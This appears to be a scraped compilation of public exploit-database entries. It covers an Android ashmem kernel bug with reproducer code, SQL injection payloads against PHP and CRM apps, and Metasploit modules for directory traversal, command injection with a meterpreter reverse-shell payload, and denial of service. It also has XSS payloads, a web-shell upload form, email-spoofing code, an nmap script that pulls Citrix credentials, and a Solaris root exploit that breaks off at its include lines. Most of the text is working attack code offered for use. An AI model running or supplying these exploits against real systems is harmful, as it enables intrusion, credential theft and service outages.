ISHACK AI BOT

This bug report describes two ways in which an attacker can modify the contents of a read-only ashmem fd. I'm not sure at this point what the most interesting user of ashmem is in the current Android release, but there are various users, including Chrome and a bunch of utility classes. In AOSP master, there is even code in <https://android.googlesource.com/platform/art/+/master/runtime/jit/jit_memory_region.cc> that uses ashmem for some JIT zygote mapping, which sounds extremely interesting. Android's ashmem kernel driver has an ->mmap() handler that attempts to lock down created VMAs based on a configured protection mask such that in particular write access to the underlying shmem file can never be gained. It tries to do this as follows (code taken from upstream Linux drivers/staging/android/ashmem.c): static inline vm_flags_t calc_vm_may_flags(unsigned long prot) { return _calc_vm_trans(prot, PROT_READ, VM_MAYREAD) | _calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) | _calc_vm_trans(prot, PROT_EXEC, VM_MAYEXEC); } [...] static int ashmem_mmap(struct file *file, struct vm_area_struct *vma) { struct ashmem_area *asma = file->private_data; [...] /* requested protection bits must match our allowed protection mask */ if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) & calc_vm_prot_bits(PROT_MASK, 0)) { ret = -EPERM; goto out; } vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask); [...] if (vma->vm_file) fput(vma->vm_file); vma->vm_file = asma->file; [...] return ret; } This ensures that the protection flags specified by the caller don't conflict with the ->prot_mask, and it also clears the VM_MAY* flags as needed to prevent the user from afterwards adding new protection flags via mprotect(). However, it improperly stores the backing shmem file, whose ->mmap() handler does not enforce the same restrictions, in ->vm_file. An attacker can abuse this through the remap_file_pages() syscall, which grabs the file pointer of an existing VMA and calls its ->mmap() handler to create a new VMA. In effect, calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows an attacker to raise the VM_MAYWRITE bit, allowing the attacker to gain write access to the ashmem allocation's backing file via mprotect(). Reproducer (works both on Linux from upstream master in an X86 VM and on a Pixel 2 at security patch level 2019-09-05 via adb): ==================================================================== user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <sys/mman.h> #include <sys/ioctl.h> #include <sys/wait.h> #define __ASHMEMIOC 0x77 #define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t) #define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long) int main(void) { int ashmem_fd = open("/dev/ashmem", O_RDWR); if (ashmem_fd == -1) err(1, "open ashmem"); if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000)) err(1, "ASHMEM_SET_SIZE"); char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0); if (mapping == MAP_FAILED) err(1, "mmap ashmem"); if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ)) err(1, "ASHMEM_SET_SIZE"); mapping[0] = 'A'; printf("mapping[0] = '%c'\n", mapping[0]); if (dup2(ashmem_fd, 42) != 42) err(1, "dup2"); pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { execl("./ashmem_remap_attacker", "ashmem_remap_attacker", NULL); err(1, "execl"); } int status; if (wait(&status) != child) err(1, "wait"); printf("mapping[0] = '%c'\n", mapping[0]); }user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c #define _GNU_SOURCE #include <unistd.h> #include <sys/mman.h> #include <err.h> #include <stdlib.h> #include <stdio.h> int main(void) { int ashmem_fd = 42; /* sanity check */ char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0); if (write_mapping == MAP_FAILED) { perror("mmap ashmem writable failed as expected"); } else { errx(1, "trivial mmap ashmem writable worked???"); } char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0); if (mapping == MAP_FAILED) err(1, "mmap ashmem readonly failed"); if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0) errx(1, "mprotect ashmem writable worked???"); if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0)) err(1, "remap_file_pages"); if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE)) err(1, "mprotect ashmem writable failed, attack didn't work"); mapping[0] = 'X'; puts("attacker exiting"); }user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.c user@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.c user@vm:~/ashmem_remap$ ./ashmem_remap_victim mapping[0] = 'A' mmap ashmem writable failed as expected: Operation not permitted attacker exiting mapping[0] = 'X' user@vm:~/ashmem_remap$ ==================================================================== Interestingly, the (very much deprecated) syscall remap_file_pages() isn't even listed in bionic's SYSCALLS.txt, which would normally cause it to be blocked by Android's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permits it for 32-bit ARM applications: # b/36435222 int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags) arm,x86,mips ashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately, there is no access control for these - even if you only have read-only access to an ashmem file, you can still mark pages in it as purgable, causing them to effectively be zeroed out when the system is under memory pressure. Here's a simple test for that (to be run in an X86 Linux VM): ==================================================================== user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <sys/mman.h> #include <sys/ioctl.h> #include <sys/wait.h> #define __ASHMEMIOC 0x77 #define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t) #define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long) int main(void) { int ashmem_fd = open("/dev/ashmem", O_RDWR); if (ashmem_fd == -1) err(1, "open ashmem"); if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000)) err(1, "ASHMEM_SET_SIZE"); char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0); if (mapping == MAP_FAILED) err(1, "mmap ashmem"); if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ)) err(1, "ASHMEM_SET_SIZE"); mapping[0] = 'A'; printf("mapping[0] = '%c'\n", mapping[0]); if (dup2(ashmem_fd, 42) != 42) err(1, "dup2"); pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { execl("./ashmem_purge_attacker", "ashmem_purge_attacker", NULL); err(1, "execl"); } int status; if (wait(&status) != child) err(1, "wait"); printf("mapping[0] = '%c'\n", mapping[0]); } user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <sys/mman.h> #include <sys/ioctl.h> struct ashmem_pin { unsigned int offset, len; }; #define __ASHMEMIOC 0x77 #define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t) #define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin) int main(void) { struct ashmem_pin pin = { 0, 0 }; if (ioctl(42, ASHMEM_UNPIN, &pin)) err(1, "unpin 42"); /* ensure that shrinker doesn't get skipped */ int ashmem_fd = open("/dev/ashmem", O_RDWR); if (ashmem_fd == -1) err(1, "open ashmem"); if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000)) err(1, "ASHMEM_SET_SIZE"); char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0); if (mapping == MAP_FAILED) err(1, "mmap ashmem"); if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin)) err(1, "unpin 42"); /* simulate OOM */ system("sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'"); puts("attacker exiting"); } user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.c user@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.c user@vm:~/ashmem_purging$ ./ashmem_purge_victim mapping[0] = 'A' attacker exiting mapping[0] = '' user@vm:~/ashmem_purging$ ====================================================================

There is a memory corruption vulnerability in audio processing during a voice call in WeChat. When an RTP packet is processed, there is a call to UnpacketRTP. This function decrements the length of the packet by 12 without checking that the packet has at least 12 bytes in it. This leads to a negative packet length. Then, CAudioJBM::InputAudioFrameToJBM will check that the packet size is smaller than the size of a buffer before calling memcpy, but this check (n < 300) does not consider that the packet length could be negative due to the previous error. This leads to an out-of-bounds copy. To reproduce the bug: 1) install and run frida on the caller Android device and a desktop host (https://www.frida.re) 2) copy the filed in the attached directory to /data/local/tmp/packs/, so that /data/local/tmp/packs/opack0 exists 3) run "setenforce 0" on the caller device 4) extract replay.py and replay.js into the same directory on a desktop host and run: python3 replay.py DEVICENAME Wait for the word "READY" to display. If you don't know your device name, you can list device names by running: python3 replay.py 5) start a voice call and answer it on the target device. A crash will occur in about 10 seconds. A crash log is attached. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47920.zip

# Exploit Title: Online Book Store 1.0 - 'bookisbn' SQL Injection # Google Dork: N/A # Date: 2020-01-15 # Exploit Author: AmirHadi Yazdani (Ertebat Gostar Co.) # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip # Version: 1.0 # Tested on: Ubuntu 16.04 # CVE: N/A -------------- Vulnerable code in book.php ( Line 1-25) ----------------------------------------------- $book_isbn = $_GET['bookisbn']; // vulnerable param // connecto database require_once "./functions/database_functions.php"; $conn = db_connect(); $query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'"; // Injectable Point $result = mysqli_query($conn, $query); if(!$result){ echo "Can't retrieve data " . mysqli_error($conn); exit; } $row = mysqli_fetch_assoc($result); if(!$row){ echo "Empty book"; exit; } $title = $row['book_title']; require "./template/header.php"; ?> <!-- Example row of columns --> <p class="lead" style="margin: 25px 0"><a href="books.php">Books</a> > <?php echo $row['book_title']; ?></p> // results goes here ------------------------------------------------------------------------------------------------------------------- Exploit POC : # Parameter: bookisbn (GET) # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) #Payload: http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp ----------------------- Other Vulnerable Pages with Same vulnerability : [PAGE :bookPerPub.php], [PARAM : pubid ], [Method : GET], [Vulnerable Code : Line 6 & Line 16] [PAGE :edit_book.php], [PARAM : publisher ], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31] [PAGE :checkout.php , Function : getBookByIsbn , Defined in database_functions.php], [PARAM : $isbn ], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php] and other pages .... :) Also you can have more fun with Other XSS bugs too :) ----

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'Huawei HG255 Directory Traversal', ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’, ‘Author’ => ‘Ismail Tasdelen’, ‘License’ => MSF_LICENSE, ‘References’ => [ ['CVE', '2017-17309' ], ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en'] ] ) register_options( [ Opt::RPORT(80) ], self.class ) end def run urllist=[ ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’, ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’, ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’, ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’] urllist.each do |url| begin res = send_request_raw( { ‘method’=> ‘GET’, ‘uri’=> url }) if res print_good(“Vulnerable! for #{url}”) else print_status(“Vulnerable(no response) detected for #{url}”) end rescue Errno::ECONNRESET print_status(“Vulnerable(rst) detected for #{url}”) rescue Exception print_error(“Connection failed.”) end end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => "Barco WePresent file_transfer.cgi Command Injection", 'Description' => %q( This module exploits an unauthenticated remote command injection vulnerability found in Barco WePresent and related OEM'ed products. The vulnerability is triggered via an HTTP POST request to the file_transfer.cgi endpoint. ), 'License' => MSF_LICENSE, 'Author' => 'Jacob Baines', # @Junior_Baines' 'References' => [ ['CVE', '2019-3929'], ['EDB', '46786'], ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c'] ], 'DisclosureDate' => "Apr 30, 2019", 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'Privileged' => false, 'Targets' => [ ['Unix In-Memory', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' } }], ['Linux Dropper', 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'CmdStagerFlavor' => ['printf', 'wget'], 'Type' => :linux_dropper] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443, 'CMDSTAGER::FLAVOR' => 'printf', 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' })) end def filter_bad_chars(cmd) cmd.gsub!(/;/, 'Pa_Note') cmd.gsub!(/\+/, 'Pa_Add') cmd.gsub!(/&/, 'Pa_Amp') return cmd end def send_command(cmd, timeout) vars_post = { file_transfer: 'new', dir: "'#{filter_bad_chars(cmd)}'" } send_request_cgi({ 'uri' => '/cgi-bin/file_transfer.cgi', 'method' => 'POST', 'vars_post' => vars_post }, timeout) end def check check_resp = send_command(";whoami;", 5) unless check_resp return CheckCode::Unknown('Connection failed.') end if check_resp.code == 200 check_resp.body.gsub!(/[\r\n]/, "") if check_resp.body == "root" return CheckCode::Vulnerable end end CheckCode::Safe end def execute_command(cmd, _opts = {}) send_command(";(#{cmd})&", nil) end def exploit case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 128) end end end

# Exploit Title: WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting # Google Dork: inurl:/wp-content/plugins/postie/readme.txt # Date: 2020-01-15 # Exploit Author: V1n1v131r4 # Vendor Homepage: https://postieplugin.com/ # Software Link: https://wordpress.org/plugins/postie/#developers # Version: <=1.9.40 # Tested on: Linux # CVE : CVE-2019-20203, CVE-2019-20204 ## Identifying WordPress Postie Plugin installation #!/bin/bash if curl -s -o /dev/null -w "%{http_code}" http://<domain.com>/wp-content/plugins/postie/readme.txt | grep 200 > /dev/null; then echo "" echo "Postie installed!" else echo "" echo "Postie seems not to be installed" fi ## Performing persistent XSS using Polyglot JavaScript syntax with crafted SVG (CVE-2019-20204) # the syntax below should go as email body jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(You've been hacked)//'> ## Email to post on Postie - Identifying the mail server dig domain.com mx - enumerating accounts via SMTP telnet domain.com 587 EHLO buddy mail from:<[email protected]> rcpt to:<[email protected]> vrfy [email protected] - listing accounts via third party software You can use these third party software and APIs to enumerate target email users: - https://www.zerobounce.net - https://tools.verifyemailaddress.io/ - https://hunter.io/email-verifier ## Spoofing with PHPMailer <?php /* CONFIGURE PHP IF NEEDED */ // ini_set("sendmail_from","$fromFull"); // ini_set("SMTP","mail.domain.com"); // ini_set('smtp_port',587); // ini_set('username',"user"); // ini_set('password',"pass"); // COMPOSE $to = '[email protected]'; $subject = 'Title of your post'; $message = 'You've been hacked :-)'; // BASIC HEADER $headers = 'From: [email protected]' . "\r\n" . 'Reply-To: [email protected]' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); // SEND AND SHOW MESSAGE if (mail($to, $subject, $message, $headers)) echo $headers.'<h1>Mail sent!</h1>'; else echo '<h1>Something went wrong...</h1>'; // FULL HEADER // $headers = "From: testsite < [email protected] >\n"; // $headers .= "Cc: testsite < [email protected] >\n"; // $headers .= "X-Sender: testsite < [email protected] >\n"; // $headers .= 'X-Mailer: PHP/' . phpversion(); // $headers .= "X-Priority: 1\n"; // $headers .= "Return-Path: [email protected]\n"; // $headers .= "MIME-Version: 1.0\r\n"; // $headers .= "Content-Type: text/html; charset=iso-8859-1\n"; ?>

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting # Exploit Author: Ai Ho # Vendor Homepage : https://jenkins.io/ # Effective version : Gitlab Hook Plugin 1.4.2 and earlier # References: https://jenkins.io/security/advisory/2020-01-15/ # CVE: CVE-2020-2096 # PoC: http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E

# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection # Google Dork: N/A # Date: 2020-01-15 # Blog: https://fatihhcelik.blogspot.com/ # Exploit Author: Fatih Çelik # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://sourceforge.net/projects/rukovoditel/ # Version: 2.5.2 # Tested on: Kali Linux # CVE : N/A # Request, POST /ruko/index.php?module=items/listing HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/ruko/index.php?module=reports/view&reports_id=68%27 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 330 Connection: close Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 # PAYLOADS, # Parameter: reports_id (POST) # Type: boolean-based blind # Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' RLIKE (SELECT (CASE WHEN (9654=9654) THEN 68 ELSE 0x28 END))-- AlKt&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 8112 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(8112=8112,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rVyr&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 4324 FROM (SELECT(SLEEP(5)))KySi)-- Pfwf&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1

# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload # Google Dork: N/A # Date: 2020-01-16 # Exploit Author: Or4nG.M4n aka S4udiExploit # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip # Version: 1.0 # Tested on: MY MIND v1.23.45 # CVE: N/A # WWW . SEC4EVER . COM -> hola amigos ^.^ -> just copy this html code <form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data"> <td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td> <td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td> <td><input type="file" name="image"></td> <input type="submit" name="save_change" value="Change" class="btn btn-primary"> </form> -> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php # i think am back %^_^% # i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com # big thanks to Stupid Coder ^.^

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service', 'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.', 'Author' => 'Ismail Tasdelen', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-19833'], ['EDB', '47785'] ] ) register_options([ Opt::RPORT(8181) ]) end def run res = send_request_raw({ 'method' => 'GET', 'uri' => '/shutdown' }) if res print_status("Request sent to #{rhost}") else print_status("No reply from #{rhost}") end rescue Errno::ECONNRESET print_status('Connection reset') end end

# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal # Date: 2019-12-17 # CVE: CVE-2019-19781 # Vulenrability: Path Traversal # Vulnerablity Discovery: Mikhail Klyuchnikov # Exploit Author: Dhiraj Mishra # Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 # Vendor Homepage: https://www.citrix.com/ # References: https://support.citrix.com/article/CTX267027 # https://github.com/nmap/nmap/pull/1893 local http = require "http" local stdnse = require "stdnse" local shortport = require "shortport" local table = require "table" local string = require "string" local vulns = require "vulns" local nmap = require "nmap" local io = require "io" description = [[ This NSE script checks whether the traget server is vulnerable to CVE-2019-19781 ]] --- -- @usage -- nmap --script https-citrix-path-traversal -p <port> <host> -- nmap --script https-citrix-path-traversal -p <port> <host> --script-args output='file.txt' -- @output -- PORT STATE SERVICE -- 443/tcp open http -- | CVE-2019-19781: -- | Host is vulnerable to CVE-2019-19781 -- @changelog -- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) -- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) -- @xmloutput -- <table key="NMAP-1"> -- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem> -- <elem key="state">VULNERABLE</elem> -- <table key="description"> -- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path -- traversal vulnerability that allows attackers to read configurations or any other file. -- </table> -- <table key="dates"> -- <table key="disclosure"> -- <elem key="year">2019</elem> -- <elem key="day">17</elem> -- <elem key="month">12</elem> -- </table> -- </table> -- <elem key="disclosure">17-12-2019</elem> -- <table key="extra_info"> -- </table> -- <table key="refs"> -- <elem>https://support.citrix.com/article/CTX267027</elem> -- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem> -- </table> -- </table> author = "Dhiraj Mishra (@RandomDhiraj)" Discovery = "Mikhail Klyuchnikov (@__Mn1__)" license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"discovery", "intrusive","vuln"} portrule = shortport.ssl action = function(host,port) local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil local vuln = { title = 'Citrix ADC Path Traversal', state = vulns.STATE.NOT_VULN, description = [[ Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path traversal vulnerability that allows attackers to read configurations or any other file. ]], references = { 'https://support.citrix.com/article/CTX267027', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', }, dates = { disclosure = {year = '2019', month = '12', day = '17'}, }, } local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) local path = "/vpn/../vpns/cfg/smb.conf" local response local output = {} local success = "Host is vulnerable to CVE-2019-19781" local fail = "Host is not vulnerable" local match = "[global]" local credentials local citrixADC response = http.get(host, port.number, path) if not response.status then stdnse.print_debug("Request Failed") return end if response.status == 200 then if string.match(response.body, match) then stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME,host.targetname or host.ip, path) vuln.state = vulns.STATE.VULN citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path)) if outputFile then credentials = response.body:gsub('%W','.') vuln.check_results = stdnse.format_output(true, citrixADC) vuln.extra_info = stdnse.format_output(true, "Credentials are being stored in the output file") file = io.open(outputFile, "a") file:write(credentials, "\n") else vuln.check_results = stdnse.format_output(true, citrixADC) end end elseif response.status == 403 then stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname or host.ip, path, response.status) vuln.state = vulns.STATE.NOT_VULN end return vuln_report:make_output(vuln) end

# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection # Google Dork: N/A # Date: 2020-01-15 # Blog: https://fatihhcelik.blogspot.com/ # Exploit Author: Fatih Çelik # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://sourceforge.net/projects/rukovoditel/ # Version: 2.5.2 # Tested on: Kali Linux # CVE : N/A # Request, GET /ruko/index.php?module=entities/fields&entities_id=25 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/ruko/index.php?module=entities/fields&entities_id=25 Connection: close Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # PAYLOADS, # Parameter: entities_id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause Payload: module=entities/fields&entities_id=25' AND 2091=2091 AND 'emRY'='emRY # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: module=entities/fields&entities_id=25' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(2023=2023,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZZpM'='ZZpM # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: module=entities/fields&entities_id=25' AND (SELECT 5681 FROM (SELECT(SLEEP(5)))rdOz) AND 'vWza'='vWza # Type: UNION query # Title: Generic UNION query (NULL) - 23 columns Payload: module=entities/fields&entities_id=25' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706a71,0x5a664143527068525459496254624c514e45694d42776a6d67614a68434c6762434f62514d4f4566,0x7162787871),NULL-- syQw

# Exploit: SunOS 5.10 Generic_147148-26 - Local Privilege Escalation # Date: 2020-01-15 # Author: Marco Ivaldi # Vendor: www.oracle.com # Software Link: https://www.oracle.com/technetwork/server-storage/solaris10/downloads/latest-release/index.html # CVE: CVE-2020-2696 /* * raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel * Copyright (c) 2019-2020 Marco Ivaldi <[email protected]> * * A buffer overflow in the CheckMonitor() function in the Common Desktop * Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with * Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain * root privileges via a long palette name passed to dtsession in a malicious * .Xdefaults file (CVE-2020-2696). * * "I always loved Sun because it was so easy to own. Now with Solaris 11 I * don't like it anymore." -- ~B. * * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory * space, try returning to sprintf() instead of strcpy(). * * I haven't written a Solaris/SPARC version because I don't have a SPARC box * on which Solaris 10 can run. If anybody is kind enough to give me access to * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. * * Usage: * $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall * [on your xserver: disable the access control] * $ ./raptor_dtsession_ipa 192.168.1.1:0 * [...] * # id * uid=0(root) gid=1(other) * # * * Tested on: * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) * [previous Solaris versions are also likely vulnerable] */ #include <fcntl.h> #include <link.h> #include 